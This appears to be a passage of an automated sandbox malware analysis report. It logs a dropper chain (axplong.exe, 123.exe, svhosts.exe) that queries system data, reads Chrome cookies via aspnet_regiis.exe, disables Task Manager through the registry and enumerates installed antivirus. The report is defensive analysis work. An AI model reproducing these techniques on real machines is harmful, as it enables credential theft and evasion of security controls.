Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,	12_2_0016C951
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: EnumSystemLocalesW,	12_2_0016C9F8
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: EnumSystemLocalesW,	12_2_00164A45
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: EnumSystemLocalesW,	12_2_0016CA43
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: EnumSystemLocalesW,	12_2_0016CADE
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_0016CB69
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,	12_2_0016CDBC
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_0016CEE5
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	12_2_0016C756
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,	12_2_00164F6B
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,	12_2_0016CFEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Users\user\Desktop\1Vkf7silOj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000110001\123.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000110001\123.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\1.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000110001\123.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\lockfile VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Queries volume information: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Code function: 10_2_006CCAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

10_2_006CCAED

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Code function: 10_2_006B6590 LookupAccountNameA,

10_2_006B6590

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 18_2_006323B7 _free,_free,_free,GetTimeZoneInformation,_free,

18_2_006323B7

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 18_2_005F7CE0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

18_2_005F7CE0

Source: C:\Users\user\Desktop\1Vkf7silOj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Windows\System32\reg.exe

Registry value created: DisableTaskMgr 1

Disables the Windows task manager (taskmgr)

Source: C:\Windows\System32\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Source: 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q7C:\Users\user~1\AppData\Local\Temp\1000110001\123.exe
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001137000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000A.00000002.3800589612.0000000006030000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2093712705.0000000005730000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2096055100.00000000062FB000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2064373111.0000000000F37000.00000004.00000010.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2105803623.000000006EDBD000.00000004.00000001.01000000.0000000D.sdmp, 123.exe, 00000028.00000002.2064638926.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2068555667.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2064638926.0000000001012000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user~1\AppData\Local\Temp\1000110001\123.exe
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user~1\AppData\Local\Temp\1000110001\123.exe
Source: 1Vkf7silOj.exe, 00000001.00000002.1597298583.0000000005E3E000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2096055100.000000000630F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1849071993.000001F256638000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000021.00000003.1946811946.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000021.00000002.2010093973.00000000025CC000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2064373111.0000000000F37000.00000004.00000010.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2064638926.0000000001012000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3924492126.0000000006C48000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000003.1996465622.000000001D1B1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000003.2111086180.000000001D1B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 123.exe

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
